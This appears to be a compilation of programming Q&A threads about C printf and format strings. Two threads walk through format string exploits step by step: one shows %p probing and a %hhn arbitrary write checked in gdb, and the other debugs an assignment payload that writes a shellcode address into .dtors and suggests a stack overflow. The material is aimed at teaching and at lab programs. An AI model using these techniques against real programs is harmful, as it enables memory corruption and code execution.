How do I use formatstring to print out a string? - c

I'm going through tutorials on formatstring vulnerabilities to learn how to code more securely. The program I've written so far is as follows:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
char text[100];
strcpy(text, argv[1]);
printf(text);
}
I'm running it like this:
>>> ./foo $(ruby -e 'print "AAAA" + "%08x."*9 + "%x"')
AAAAffe466f4.00000001.f763b1c9.ffe458df.ffe458de.00000000.ffe459c4.ffe45964.00000000.41414141
I can see the "41414141" at the end, which is the AAAA at the beginning of the string. However, when I use "%s" instead like so:
>>> ./foo $(ruby -e 'print "AAAA" + "%08x."*9 + "%s"')
I get a segfault. Can anyone point me in the right direction?

The thing is that at this point, you reach raw AAAA on the stack; however, the %s specifier expects a pointer to a string, i.e. the address of your AAAA, instead. There is no format string specifier for what you want to do as in the normal course of execution you wouldn't have a string pasted directly as printf()'s parameter; one idea would be %c%c%c%c to at least print the data as characters instead of hex values, but that will not work either as the smallest size of a parameter in C is an int and even the %c specifier works with int-sized parameter memory region.

It's generally undefined behaviour to use printf on a dynamic string, since you can't guarantee that the string isn't free of format specifiers. The correct thing is to say,
printf("%s", text);
or just
puts(text);
Now, that said, your first example comes down to printf("%x%x");. This is of course UB, but the two %x specifiers just make you read a bounded amount off the stack (two words), which will print garbage, but only a finite amount.
On the other hand, when you say printf("%s"), the function expects a pointer to a null-terminated sequence of bytes in a memory region which you do not control! Essentially, the function will read one word off the stack, pretend it is a pointer, and read the memory pointed to by that value -- which will almost certainly cause a segmentation fault, since you aren't allowed to access most memory addresses by default. And even if the address points into memory you're allowed to access, there's no reason there should be a zero byte coming up soon, and so you may well just run off the page and into illegal memory.

In test you have at the end %s. printf expects a char-pointer when it encounters a %s but you don't provide any --> segfault. Use puts instead or printf("%s", test);
$ ruby -e 'print "AAAA" + "%08x."*9 + "%x"'
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%x
$ ruby -e 'print "AAAA" + "%08x."*9 + "%s"'
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s
Both strings are invalid for printf because you are not passing the arguments required.

Related

C sprintf exploit (formatting attack)

I want to write the integer 1 to the address 0x08049940 using the format string exploit (specifally the sprintf)
this is how the function looks like
void greet(char *s) {
char buf[666];
sprintf(buf, "Hello %s!\n", s);
printf(buf);
}
I tried multiple tutorials but I believe they don't work because my string allready starts with "Hello ". So I tried to start writing lower using the input
%.1%n\x39\x99\x04\x08
which is 7 values lower, as well as other addresses in the neighbourhood of the original one. Yet my gdb debugger keeps telling me that the adress on 0x08049940 is still the default address specified in code.
You wouldn't exploit the sprintf to have a format string attack, but the later printf call.
Exploiting this is rather easy if you can observe the output. Instead of going for exploit directly, you can craft a string with enough %p or %x until you see your desired bytes. For example this program works for me:
#include <stdio.h>
void greet(char *s) {
char buf[666];
sprintf(buf, "Hello %s!\n", s);
printf(buf);
}
int main(void) {
greet("aaaaaa%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
"%p%p%p%p%p%p%p%0#p\x01\x02\x03\x04");
}
I compile with gcc -m32 and run, the output is
Hello aaaaaaaa0x566386f00x566386fc0x566385ac0xf7f4e5580x1
0x10x566386fc0x6548d9a40x206f6c6c0x616161610x61616161
0x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x4030201!
Now that we see the 0x04030201, we can change the final %0#p to %hhn to write one byte to the address, or %hn for a short, or %n for int. This number is the count of characters written so far, converted to char, short or int.
When we know where in stack the address is, we can change each %p to %c and we know that it is going to consume exactly one character, giving better control over the resulting number.
We've got some slack with as in the beginning - this can be used to change the precision of one of the conversions there to change the number of character written easily as desired (for example if the resulting number is 123 too low, it can be extended by printing one character with 124 character field width: %124c); the addition of count there can be offset by removing 3 a's from the prompt.
Again this can be verified by using %0#p:
greet("aaa%123c%c%c%c%c%c%p%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%0#p\x01\x02\x03\x04");
and we get:
Hello aaa
���X0x565e46fc�la1%%%%%%%%%%%%0x4030201!
Finally we just replace %0#p with %hhn and there be magic.
To demonstrate that it really is writing to the address 0x04030201, you can use gdb to find out the address that caused the violation:
Program received signal SIGSEGV, Segmentation fault.
0xf7e216aa in vfprintf () from /lib32/libc.so.6
(gdb) p $_siginfo._sifields._sigfault.si_addr
$1 = (void *) 0x4030201
And the rest is left as an exercise to the reader...

**argv contain a lot of characters than expected

First, I need to execute two commands with system(), for example, I receive an string and open this string with an text editor, like this:
$ ./myprogram string1
And the output should be a command like this:
$ vim string1
But, I cannot find a way to do this like this pseudo code:
system("vim %s",argv[1]); //Error:
test.c:23:3: error: too many arguments to function 'system'
system("vim %s",argv[1]);
Therefore, my solution is store the argv[1] on a char array that already initialized with four characters, like this:
char command[strlen(argv[1])+4];
command[0] = 'v'; command [1] = 'i'; command[2] = 'm'; command[3] = ' ';
And assign the argv[1] to my new char array:
for(int i = 0; i < strlen(argv[1]) ; i++)
command[i+4] = argv[1][i];
And finally:
system(command);
But, if the arguments given to my program has less than 3 characters, its works fine, but if not, some weird characters that I do not expect appear in the output, like this:
./myprogramg 1234
And the output is:
$ vim 12348�M�
How can I solve this bug and why does this happen?
The full code is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc,char **argv) {
char command[strlen(argv[1])+4];
command[0] = 'v'; command [1] = 'i'; command[2] = 'm'; command[3] = ' ';
for(int i = 0; i < strlen(argv[1]) ; i++)
command[i+4] = argv[1][i];
system(command);
return 0;
}
You need to NUL terminate your C-style strings, and that includes allocating enough memory to hold the NUL.
Your array is a byte short (must be char command[strlen(argv[1])+4+1]; to leave space for NUL), and you should probably just use something like sprintf to fill it in, e.g.:
sprintf(command, "vim %s", argv[1]);`
That's simpler than manual loops, and it also fills in the NUL for you.
The garbage you see is caused by the search for the NUL byte (which terminates the string) wandering off into unrelated (and undefined for that matter) memory that happens to occur after the buffer.
The reason you're running into problems is that you aren't terminating your command string with NULL. But you really want to use sprintf (or even better to use snprintf) for something like this. It works similarly to printf but outputs to memory instead of stdout and handles the terminating NULL for you. E.g:
char cmd[80];
snprintf(cmd, 80, "vim %s", argv[1])
system(cmd);
As #VTT points out, this simplified code assumes that the value in argv[1] will be less than 75 characters (80 minus 4 for "vim " minus 1 for the NULL character). One safer option would be to verify this assumption first and throw an error if it isn't the case. To be more flexible you could dynamically allocate the cmd buffer:
char *cmd = "vim ";
char *buf = malloc(strlen(argv[1]) + strlen(cmd) + 1);
sprintf(buf, "%s%s", cmd, argv[1]);
system(buf);
free(buf);
Of course you should also check to be sure argc > 1.
I know that there are already good answers here, but I'd like to expand them a little bit.
I often see this kind of code
system("vim %s",argv[1]); //Error:
and beginners often wonder, why that is not working.
The reason for that is that "%s", some_string is not a feature of the C
language, the sequence of characters %s has no special meaning, in fact it is
as meaningful as the sequence mickey mouse.
The reason why that works with printf (and the other members of the
printf-family) is because printf was designed to replace sequences like
%s with a value passed as an argument. It's printf which make %s special,
not the C language.
As you may have noticed, doing "hallo" + " world" doesn't do string
concatenation. C doesn't have a native string type that behaves like C++'s
std::string or Python's String. In C a string is just a sequence of
characters that happen to have a byte with value of 0 at the end (also called
the '\0'-terminating byte).
That's why you pass to printf a format as the first argument. It tells
printf that it should print character by character unless it finds a %,
which tells printf that the next character(s)1 is/are special and
must substitute them with the value passed as subsequent arguments to printf.
The %x are called conversion specifiers and the documentation of printf
will list all of them and how to use them.
Other functions like the scanf family use a similar strategy, but that doesn't
mean that all functions in C that expect strings, will work the same way. In
fact the vast majority of C functions that expect strings, do not work in that
way.
man system
#include <stdlib.h>
int system(const char *command);
Here you see that system is a function that expects one argument only.
That's why your compiler complains with a line like this: system("vim %s",argv[1]);.
That's where functions like sprintf or snprintf come in handy.
1If you take a look at the printf documentation you will see that
the conversion specifier together with length modifiers can be longer than 1
character.

How do you explain the output from this function-like macro `slice` in C?

#include <stdio.h>
#define slice(bare_string,start_index) #bare_string+start_index
#define arcane_slice(bare_string,start_index) "ARCANE" #bare_string+start_index
int main(){
printf("slice(FIRSTA,0)==> `%s`\n",slice(FIRSTA,0));
printf("slice(SECOND,2)==> `%s`\n",slice(SECOND,2));
printf("slice(THIRDA,5)==> `%s`\n",slice(THIRDA,5));
printf("slice(FOURTH,6)==> `%s`\n",slice(FOURTH,6));
printf("slice(FIFTHA,7)==> `%s`\n",slice(FIFTHA,7));
printf("arcane_slice(FIRSTA,0)==> `%s`\n",arcane_slice(FIRST,0));
printf("arcane_slice(SECOND,2)==> `%s`\n",arcane_slice(SECOND,2));
printf("arcane_slice(THIRDA,5)==> `%s`\n",arcane_slice(THIRDA,5));
printf("arcane_slice(FOURTH,6)==> `%s`\n",arcane_slice(FOURTH,6));
printf("arcane_slice(FIFTHA,7)==> `%s`\n",arcane_slice(FIFTHA,7));
return 0;
}
OUTPUT:
slice(FIRSTA,0)==> `FIRSTA`
slice(SECOND,2)==> `COND`
slice(THIRDA,5)==> `A`
slice(FOURTH,6)==> ``
slice(FIFTHA,7)==> `slice(FIFTHA,7)==> `%s`
`
arcane_slice(FIRSTA,0)==> `ARCANEFIRST`
arcane_slice(SECOND,2)==> `CANESECOND`
arcane_slice(THIRDA,5)==> `ETHIRDA`
arcane_slice(FOURTH,6)==> `FOURTH`
arcane_slice(FIFTHA,7)==> `IFTHA`
I have the above C code that I need help on. I am getting weird behaviour from
the function-like macro slice that is supposed to 'slice' from a passed index
to the end of the string. It does not slice in the real sense but passes
a pointer from a certain point to printf which starts printing from that
address. I have managed to figure out that in arcane_slice the strings
are concatenated first then 'sliced'. I also have figured out that when start_index
is equal to 6 printf starts printing from the null byte and that is why
you get the 'empty' string. The strange part is when start_index is 7. It prints
the first argument to printf(interpolator string) concatendated with the passed bare string in both.
arcane_slice and slice(as shown in the 5th and 10th lines in the output)
Why is that so?
My wildest guess is that when the start_index exceeds the length of the strings,
the pointer points to the start of the data segment in the program's address space. But
then you could counter that with "why didn't it start printing from FIRSTA"
Not any "data segment", the stack. This is what I remember: when C calls a function it first puts data on stack, first variable arguments, then the format, all being the addresses to the memory sequentially allocated with your text. In that block of memory, the last argument (c-string) goes first, and the first goes last, thus:
Memory:
"FIFTHA\0slice(FIFTHA,7)==> `%s`\n\0"
Arguments:
<pointer-to-"FIFTHA"> <pointer-to-"slice...">
Since you overincrement the first one it skips the '\0' character and points at the format as well.
Try to experiment with this with more placeholders, like
printf("1: %s, 2: %s\n", slice(FIFTHA,7), slice(FIFTHA,6));
slice(bare_string,start_index) #bare_string+start_index
you are passing a string and bare_string stores the starting address of string which you have passed and then you returning changed pointer location which is bare_string+start_index
char str[6]="Hello";
char *ptr =str;
printf("%s\n",str);//prints hello
printf("%s\n",str+1);//prints ello
printf("%s\n",str+2);//prints llo
printf("%s\n",str+3);//prints lo
printf("%s\n",str+4);//prints o
printf("%s %c=%d \n",str+5,*(str+5),*(str+5));//prints Null
printf("%s %c=%d \n",str+6,*(str+6),*(str+6));//prints Null or may be Undefined behavior
printf("%s %c=%d \n",str+7,*(str+7),*(str+7));//prints Null or may be Undefined behaviour
the same scenario is happing in your case.
Test Code:
#include<stdio.h>
main()
{
char str[6]="Hello";
char *ptr =str;
printf("%s\n",str);//prints hello
printf("%s\n",str+1);//prints ello
printf("%s\n",str+2);//prints llo
printf("%s\n",str+3);//prints lo
printf("%s\n",str+4);//prints o
printf("%s %c=%d \n",str+5,*(str+5),*(str+5));//prints Null
printf("%s %c=%d \n",str+6,*(str+6),*(str+6));//prints Null or may be Undefined behavior
printf("%s %c=%d \n",str+7,*(str+7),*(str+7));//prints Null or may be Undefined behaviour
}
You have answered your question yourself. "FIFTHA"+7 gives you a pointer outside the string object, which is undefined behavior in C.
There's no easy way to get a more Python-like behavior for such "slices" in C. You could make it work for indexes up to a certain upper limit by adding a suffix to your string, full of zero bytes:
#define slice(bare_string,start_index) ((#bare_string "\0\0\0\0\0\0\0")+(start_index))
Also, when using macros, it's good practice (and avoids bugs too) to use parentheses excessively.
#define slice(bare_string,start_index) ((#bare_string)+(start_index))
#define arcane_slice(bare_string,start_index) (("ARCANE" #bare_string)+(start_index))

how can I printf in c

How can I make this print properly without using two printf calls?
char* second = "Second%d";
printf("First%d"second,1,2);
The code you showed us is syntactically invalid, but I presume you want to do something that has the same effect as:
printf("First%dSecond%d", 1, 2);
As you know, the first argument to printf is the format string. It doesn't have to be a literal; you can build it any way you like.
Here's an example:
#include <stdio.h>
#include <string.h>
int main(void)
{
char *second = "Second%d";
char format[100];
strcpy(format, "First%d");
strcat(format, second);
printf(format, 1, 2);
putchar('\n');
return 0;
}
Some notes:
I've added a newline after the output. Output text should (almost) always be terminated by a newline.
I've set an arbitrary size of 100 bytes for the format string. More generally, you could declare
char *format;
and initialize it with a call to malloc(), allocating the size you actually need (and checking that malloc() didn't signal failure by returning a null pointer); you'd then want to call free(format); after you're done with it.
As templatetypedef says in a comment, this kind of thing can be potentially dangerous if the format string comes from an uncontrolled source.
(Or you could just call printf twice; it's not that much more expensive than calling it once.)
Use the preprocessor to concatenate the two strings.
#define second "Second%d"
printf("First%d"second,1,2);
Do not do this in a real program.
char *second = "Second %d";
char *first = "First %d";
char largebuffer[256];
strcpy (largebuffer, first);
strcat (largebuffer, second);
printf (largebuffer, 1, 2);
The problem with using generated formats such as the method above is that the printf() function, since it is a variable length argument list, has no way of knowing the number of arguments provided. What it does is to use the format string provided and using the types as described in the format string it will then pick that number and types of arguments from the argument list.
If you provide the correct number of arguments like in the example above in which there are two %d formats and there are two integers provided to be printed in those places, everything is fine. However what if you do something like the following:
char *second = "Second %s";
char *first = "First %d";
char largebuffer[256];
strcpy (largebuffer, first);
strcat (largebuffer, second);
printf (largebuffer, 1);
In this example the printf() function is expecting the format string as well as a variable number of arguments. The format string says that there will be two additional arguments, an integer and a zero terminated character string. However only one additional argument is provided so the printf() function will just use what ever is next on the stack as being a pointer to a zero terminated character string.
If you are lucky, the data that the printf() function interprets as a pointer will a valid memory address for your application and the memory area pointed to will be a couple of characters terminated by a zero. If you are less lucky the pointer will be zero or garbage and you will get an access violation right then and it will be easy to find the cause of the application crash. If you have no luck at all, the pointer will be good enough that it will point to a valid address that is about 2K of characters and the result is that printf() will totally mess up your stack and go into the weeds and the resulting crash data will be pretty useless.
char *second = "Second%d";
char tmp[256];
memset(tmp, 0, 256);
sprintf(tmp, second, 2);
printf("First%d%s", 1,tmp);
Or something like that
I'm assuming you want the output:
First 1 Second 2
To do this we need to understand printf's functionality a little better. The real reason that printf is so useful is that it not only prints strings, but also formats variables for you. Depending on how you want your variable formatted you need to use different formatting characters. %d tells printf to format the variable as a signed integer, which you already know. However, there are other formats, such as %f for floats and doubles, %l% for long integers, and %s for strings, or char*.
Using the %s formatting character to print your char* variable, second, our code looks like this:
char* second = "Second";
printf ( " First %d %s %d ", 1, second, 2 );
This tells printf that you want the first variable formatted as an integer, the second as a string, and the third as another integer.

Format String Vulnerability troubles

So I have this function:
void print_usage(char* arg)
{
char buffer[640];
sprintf(buffer, "Usage: %s [options]\n"
"Randomly generates a password, optionally writes it to /etc/shadow\n"
"\n"
"Options:\n"
"-s, --salt <salt> Specify custom salt, default is random\n"
"-e, --seed [file] Specify custom seed from file, default is from stdin\n"
"-t, --type <type> Specify different encryption method\n"
"-v, --version Show version\n"
"-h, --help Show this usage message\n"
"\n"
"Encryption types:\n"
" 0 - DES (default)\n"
" 1 - MD5\n"
" 2 - Blowfish\n"
" 3 - SHA-256\n"
" 4 - SHA-512\n", arg);
printf(buffer);
}
I wish to utilize a format string vulnerability attack (my assignment). Here is my attempt:
I have an exploit program which fills a buffer with noops and shell code (I have used this program to buffer overflow the same function, so I know its good). Now, I did an object dump of the file to find the .dtors_list address and I got 0x0804a20c, adding 4 bytes to get the end I get 0x804a210.
Next I used gdb to find at what address my noops begin while running my program. Using this I got 0xffbfdbb8.
So up to this point I feel like I'm correct, now I know I want to use format string to copy the noop address into my .dtors_end address. Here is the string I came up with (this is the string I'm providing as user input to the function):
"\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%%.168u%%1$n%%.51u%%2$n%%.228u%%3$n%%.64u%%4$n"
This doesn't work for me. The program runs normally and the %s is replaced with the string I input (minus the little endian memory address at the front, and the two percent signs are now one percent sign for some reason).
Anyways, I'm kind of stumped here, any help would be appreciated.
Disclaimer: I'm no expert.
You're passing "\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%%.168u%%1$n%%.51u%%2$n%%.228u%%3$n%%.64u%%4$n" as the value of arg? That means that buffer will contain
"Usage:\x20\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%.168u%1$n%.51u%2$n%.228u%3$n%.64u%4$n [options]\x0aRandomly..."
Now let's further assume that you're on an x86-32 target (if you're on x86-64, this won't work), and that you're compiling with an optimization level that doesn't put anything in print_usage's stack frame except for the 640-byte buffer array.
Then printf(buffer) will do the following things, in order:
Push the 4-byte address &buffer.
Push a 4-byte return address.
Invoke printf...
Print out "Usage:\x20\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08" (a sequence of 23 bytes).
%.168u: Interpret the next argument to printf as an unsigned int and print it in a field of width 168. Since printf has no next argument, this is actually going to print the next thing on the stack; that is, the first four bytes of buffer; that is, "Usag" (0x67617355).
%1$n: Interpret the second argument to printf as a pointer to int and store 23+168 at that location. This stores 0x000000bf in location 0x67617355. So this is your main problem: You should have used %2$n instead of %1$n and added one junk byte to the front of your arg. (Incidentally, notice that GNU says "If any of the formats has a specification for the parameter position all of them in the format string shall have one. Otherwise the behavior is undefined." So you should go through and add 1$s to all your %us just to be on the safe side.)
%.51u: Print another 51 bytes of garbage.
%2$n: Interpret the third argument to printf as a pointer to int and store 0x000000f2 in that garbage location. As above, this should have been %3$n.
... etc. etc. ...
So, your major bug here is that you forgot to account for the "Usage: " prefix.
I assume you were trying to store the four bytes 0xffbfdbb8 into address 0x804a210. Let's say you'd gotten that to work. But then what would your next step be? How do you get the program to treat the four-byte quantity at 0x804a210 as a function pointer and jump through it?
The traditional way to exploit this code would be to exploit the buffer overflow in sprintf, rather than the more complicated "%n" vulnerability in printf. You just need to make your arg roughly 640 characters long and make sure that the 4 bytes of it that correspond to print_usage's return address contain the address of your NOP sled.
Even that part is tricky, though. You might conceivably be running into something related to ASLR: just because your sled exists at address 0xffbfdbb8 in one run doesn't mean it'll exist at that same address in the next run.
Does this help?

Resources